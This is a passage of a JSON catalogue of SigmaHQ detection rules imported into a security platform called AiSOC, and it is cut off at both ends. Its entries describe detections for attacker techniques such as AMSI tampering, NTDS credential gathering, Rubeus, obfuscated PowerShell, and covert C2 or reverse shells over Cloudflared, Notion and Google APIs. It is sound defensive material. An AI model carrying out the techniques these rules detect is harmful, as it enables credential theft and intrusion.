"sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-binary-impersonating-sysinternals-tools.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7cce6fc8-a07f-4d84-a53e-96e1879843c9", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_sysinternals_tools_masquerading.yml" } }, { "id": "sigmahq-sigma-7cd1dcdc-6edf-4896-86dc-d1f19ad64903", "type": "detection", "name": "Network Connection Initiated To Cloudflared Tunnels Domains", "description": "Detects network connections to Cloudflared tunnels domains initiated by a process on the system.\nAttackers can abuse that feature to establish a reverse shell or persistence on a machine.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1567", "T1572" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/network-connection-initiated-to-cloudflared-tunnels-domains.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7cd1dcdc-6edf-4896-86dc-d1f19ad64903", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/network_connection/net_connection_win_domain_cloudflared_communication.yml" } }, { "id": "sigmahq-sigma-7cded4b3-f09e-405a-b96f-24248433ba44", "type": "detection", "name": "OpenCanary - NTP Monlist Request", "description": "Detects instances where an NTP service on an OpenCanary node has had a NTP monlist request.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1498" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/opencanary-ntp-monlist-request.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7cded4b3-f09e-405a-b96f-24248433ba44", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/opencanary/opencanary_ntp_monlist.yml" } }, { "id": "sigmahq-sigma-7cff77e1-9663-46a3-8260-17f2e1aa9d0a", "type": "detection", "name": "AppX Package Installation Attempts Via AppInstaller.EXE", "description": "Detects DNS queries made by \"AppInstaller.EXE\". The AppInstaller is the default handler for the \"ms-appinstaller\" URI. It attempts to load/install a package from the referenced URL", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/appx-package-installation-attempts-via-appinstaller-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7cff77e1-9663-46a3-8260-17f2e1aa9d0a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/dns_query/dns_query_win_appinstaller.yml" } }, { "id": "sigmahq-sigma-7d0d0329-0ef1-4e84-a9f5-49500f9d7c6c", "type": "detection", "name": "Malicious PowerShell Commandlets - PoshModule", "description": "Detects Commandlet names from well-known PowerShell exploitation frameworks", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1482", "T1087", "T1087.001", "T1087.002", "T1069.001", "T1069.002", "T1069", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/malicious-powershell-commandlets-poshmodule.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7d0d0329-0ef1-4e84-a9f5-49500f9d7c6c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_module/posh_pm_malicious_commandlets.yml" } }, { "id": "sigmahq-sigma-7d1aaf3d-4304-425c-b7c3-162055e0b3ab", "type": "detection", "name": "Potential Data Exfiltration Activity Via CommandLine Tools", "description": "Detects the use of various CLI utilities exfiltrating data via web requests", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-data-exfiltration-activity-via-commandline-tools.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7d1aaf3d-4304-425c-b7c3-162055e0b3ab", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_data_exfiltration_via_cli.yml" } }, { "id": "sigmahq-sigma-7d416556-6502-45b2-9bad-9d2f05f38997", "type": "detection", "name": "Powershell Sensitive File Discovery", "description": "Detect adversaries enumerate sensitive files", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1083" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/powershell-sensitive-file-discovery.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7d416556-6502-45b2-9bad-9d2f05f38997", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_sensitive_file_discovery.yml" } }, { "id": "sigmahq-sigma-7d4aaec2-08ed-4430-8b96-28420e030e04", "type": "detection", "name": "Uncommon Sigverif.EXE Child Process", "description": "Detects uncommon child processes spawning from \"sigverif.exe\", which could indicate potential abuse of the latter as a living of the land binary in order to proxy execution.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1216" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/uncommon-sigverif-exe-child-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7d4aaec2-08ed-4430-8b96-28420e030e04", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_sigverif_uncommon_child_process.yml" } }, { "id": "sigmahq-sigma-7d4cdc5a-0076-40ca-aac8-f7e714570e47", "type": "detection", "name": "CMSTP Execution Process Creation", "description": "Detects various indicators of Microsoft Connection Manager Profile Installer execution", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1218.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": true, "path": "detections/sigma-imports/endpoint/cmstp-execution-process-creation.yaml", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7d4cdc5a-0076-40ca-aac8-f7e714570e47", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_cmstp_execution_by_creation.yml" } }, { "id": "sigmahq-sigma-7d604714-e071-49ff-8726-edeb95a70679", "type": "detection", "name": "Legitimate Application Dropped Script", "description": "Detects programs on a Windows system that should not write scripts to disk", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/legitimate-application-dropped-script.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7d604714-e071-49ff-8726-edeb95a70679", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_susp_legitimate_app_dropping_script.yml" } }, { "id": "sigmahq-sigma-7d6d30b8-5b91-4b90-a891-46cccaf29598", "type": "detection", "name": "Program Executed Using Proxy/Local Command Via SSH.EXE", "description": "Detect usage of the \"ssh.exe\" binary as a proxy to launch other programs.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/program-executed-using-proxy-local-command-via-ssh-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7d6d30b8-5b91-4b90-a891-46cccaf29598", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_ssh_proxy_execution.yml" } }, { "id": "sigmahq-sigma-7d9263bd-dc47-4a58-bc92-5474abab390c", "type": "detection", "name": "Change Winevt Channel Access Permission Via Registry", "description": "Detects tampering with the \"ChannelAccess\" registry key in order to change access to Windows event channel.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/change-winevt-channel-access-permission-via-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7d9263bd-dc47-4a58-bc92-5474abab390c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_change_winevt_channelaccess.yml" } }, { "id": "sigmahq-sigma-7d995e63-ec83-4aa3-89d5-8a17b5c87c86", "type": "detection", "name": "Scripted Diagnostics Turn Off Check Enabled - Registry", "description": "Detects enabling TurnOffCheck which can be used to bypass defense of MSDT Follina vulnerability", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/scripted-diagnostics-turn-off-check-enabled-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7d995e63-ec83-4aa3-89d5-8a17b5c87c86", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_enabling_turnoffcheck.yml" } }, { "id": "sigmahq-sigma-7dbbcac2-57a0-45ac-b306-ff30a8bd2981", "type": "detection", "name": "Windows AMSI Related Registry Tampering Via CommandLine", "description": "Detects tampering of AMSI (Anti-Malware Scan Interface) related registry values via command line tools such as reg.exe or PowerShell.\nAMSI provides a generic interface for applications and services to integrate with antimalware products.\nAdversaries may disable AMSI to evade detection of malicious scripts and code execution.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/windows-amsi-related-registry-tampering-via-commandline.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7dbbcac2-57a0-45ac-b306-ff30a8bd2981", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_amsi_registry_tampering.yml" } }, { "id": "sigmahq-sigma-7dc2dedd-7603-461a-bc13-15803d132355", "type": "detection", "name": "Uncommon Child Process Of Conhost.EXE", "description": "Detects uncommon \"conhost\" child processes. This could be a sign of \"conhost\" usage as a LOLBIN or potential process injection activity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1202" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/uncommon-child-process-of-conhost-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7dc2dedd-7603-461a-bc13-15803d132355", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_conhost_susp_child_process.yml" } }, { "id": "sigmahq-sigma-7df1713a-1a5b-4a4b-a071-dc83b144a101", "type": "detection", "name": "Esentutl Gather Credentials", "description": "Conti recommendation to its affiliates to use esentutl to access NTDS dumped file. Trickbot also uses this utilities to get MSEdge info via its module pwgrab.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1003", "T1003.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/esentutl-gather-credentials.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7df1713a-1a5b-4a4b-a071-dc83b144a101", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_esentutl_params.yml" } }, { "id": "sigmahq-sigma-7e3c4651-c347-40c4-b1d4-d48590fdf684", "type": "detection", "name": "Code Injection by ld.so Preload", "description": "Detects the ld.so preload persistence file. See `man ld.so` for more information.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1574.006" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/code-injection-by-ld-so-preload.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7e3c4651-c347-40c4-b1d4-d48590fdf684", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/builtin/lnx_ldso_preload_injection.yml" } }, { "id": "sigmahq-sigma-7e6237fe-3ddb-438f-9381-9bf9de5af8d0", "type": "detection", "name": "Windows Internet Hosted WebDav Share Mount Via Net.EXE", "description": "Detects when an internet hosted webdav share is mounted using the \"net.exe\" utility", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1021.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/windows-internet-hosted-webdav-share-mount-via-net-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7e6237fe-3ddb-438f-9381-9bf9de5af8d0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_net_use_mount_internet_share.yml" } }, { "id": "sigmahq-sigma-7e8f2d3b-9c1a-4f67-b9e8-8d9006e0e51f", "type": "detection", "name": "PowerShell Web Access Feature Enabled Via DISM", "description": "Detects the use of DISM to enable the PowerShell Web Access feature, which could be used for remote access and potential abuse", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1548.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/powershell-web-access-feature-enabled-via-dism.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7e8f2d3b-9c1a-4f67-b9e8-8d9006e0e51f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_dism_enable_powershell_web_access_feature.yml" } }, { "id": "sigmahq-sigma-7e9c7999-0f9b-4d4a-a6ed-af6d553d4af4", "type": "detection", "name": "Invoke-Obfuscation Via Use MSHTA - System", "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1027", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/invoke-obfuscation-via-use-mshta-system.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7e9c7999-0f9b-4d4a-a6ed-af6d553d4af4", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/system/service_control_manager/win_system_invoke_obfuscation_via_use_mshta_services.yml" } }, { "id": "sigmahq-sigma-7e9cf7b6-e827-11ed-a05b-0242ac120003", "type": "detection", "name": "Suspicious Non-Browser Network Communication With Google API", "description": "Detects a non-browser process interacting with the Google API which could indicate the use of a covert C2 such as Google Sheet C2 (GC2-sheet)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1102" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-non-browser-network-communication-with-google-api.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7e9cf7b6-e827-11ed-a05b-0242ac120003", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/network_connection/net_connection_win_domain_google_api_non_browser_access.yml" } }, { "id": "sigmahq-sigma-7e9cf7b6-e827-11ed-a05b-15959c120003", "type": "detection", "name": "Potentially Suspicious Network Connection To Notion API", "description": "Detects a non-browser process communicating with the Notion API. This could indicate potential use of a covert C2 channel such as \"OffensiveNotion C2\"", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1102" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potentially-suspicious-network-connection-to-notion-api.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7e9cf7b6-e827-11ed-a05b-15959c120003", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/network_connection/net_connection_win_domain_notion_api_susp_communication.yml" } }, { "id": "sigmahq-sigma-7ea78478-a4f9-42a6-9dcd-f861816122bf", "type": "detection", "name": "Disabled MFA to Bypass Authentication Mechanisms", "description": "Detection for when multi factor authentication has been disabled, which might indicate a malicious activity to bypass authentication mechanisms.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1556" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/disabled-mfa-to-bypass-authentication-mechanisms.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7ea78478-a4f9-42a6-9dcd-f861816122bf", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/activity_logs/azure_mfa_disabled.yml" } }, { "id": "sigmahq-sigma-7ec15688-fd24-4177-ba43-1a950537ee39", "type": "detection", "name": "The Windows Defender Firewall Service Failed To Load Group Policy", "description": "Detects activity when The Windows Defender Firewall service failed to load Group Policy", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1686.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/the-windows-defender-firewall-service-failed-to-load-group-policy.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7ec15688-fd24-4177-ba43-1a950537ee39", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/firewall_as/win_firewall_as_failed_load_gpo.yml" } }, { "id": "sigmahq-sigma-7ec2c172-dceb-4c10-92c9-87c1881b7e18", "type": "detection", "name": "HackTool - Rubeus Execution", "description": "Detects the execution of the hacktool Rubeus via PE information of command line parameters", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "critical", "category": "endpoint", "mitre_techniques": [ "T1003", "T1558.003", "T1550.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": true, "path": "detections/sigma-imports/endpoint/hacktool-rubeus-execution.yaml", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7ec2c172-dceb-4c10-92c9-87c1881b7e18", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_rubeus.yml" } }, { "id": "sigmahq-sigma-7ed2c9f7-c59d-4c82-a7e2-f859aa676099", "type": "detection", "name": "Suspicious MacOS Firmware Activity", "description": "Detects when a user manipulates with Firmward Password on MacOS. NOTE - this command has been disabled on silicon-based apple computers.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-macos-firmware-activity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7ed2c9f7-c59d-4c82-a7e2-f859aa676099", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/macos/process_creation/proc_creation_macos_susp_macos_firmware_activity.yml" } }, { "id": "sigmahq-sigma-7ee0b4aa-d8d4-4088-b661-20efdf41a04c", "type": "detection", "name": "Azure Kubernetes Secret or Config Object Access", "description": "Identifies when a Kubernetes account access a sensitive objects such as configmaps or secrets.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1485", "T1496", "T1489" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/azure-kubernetes-secret-or-config-object-access.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7ee0b4aa-d8d4-4088-b661-20efdf41a04c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/activity_logs/azure_kubernetes_secret_or_config_object_access.yml" } }, { "id": "sigmahq-sigma-7eedcc9d-9fdb-4d94-9c54-474e8affc0c7", "type": "detection", "name": "Invoke-Obfuscation COMPRESS OBFUSCATION", "description": "Detects Obfuscated Powershell via COMPRESS OBFUSCATION", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1027", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/invoke-obfuscation-compress-obfuscation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7eedcc9d-9fdb-4d94-9c54-474e8affc0c7", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_compress.yml" } }, { "id": "sigmahq-sigma-7efd2c8d-8b18-45b7-947d-adfe9ed04f61", "type": "detection", "name": "AgentExecutor PowerShell Execution", "description": "Detects execution of the AgentExecutor.exe binary. Which can be abused as a LOLBIN to execute powershell scripts with the ExecutionPolicy \"Bypass\" or any binary named \"powershell.exe\" located in the path provided by 6th positional argument", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/agentexecutor-powershell-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7efd2c8d-8b18-45b7-947d-adfe9ed04f61", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_agentexecutor_potential_abuse.yml" } }, { "id": "sigmahq-sigma-7eff1a7f-dd45-4c20-877a-f21e342a7611", "type": "detection", "name": "RemCom Service File Creation", "description": "Detects default RemCom service filename which indicates RemCom service installation and execution", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1569.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/remcom-service-file-creation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7eff1a7f-dd45-4c20-877a-f21e342a7611", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_remcom_service.yml" } }, { "id": "sigmahq-sigma-7f103213-a04e-4d59-8261-213dddf22314", "type": "detection", "name": "MSSQL XPCmdshell Suspicious Execution", "description": "Detects when the MSSQL \"xp_cmdshell\" stored procedure is used to execute commands", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/mssql-xpcmdshell-suspicious-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7f103213-a04e-4d59-8261-213dddf22314", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/application/mssqlserver/win_mssql_xp_cmdshell_audit_log.yml" } }, { "id": "sigmahq-sigma-7f2376f9-42ee-4dfc-9360-fecff9a88fc8", "type": "detection", "name": 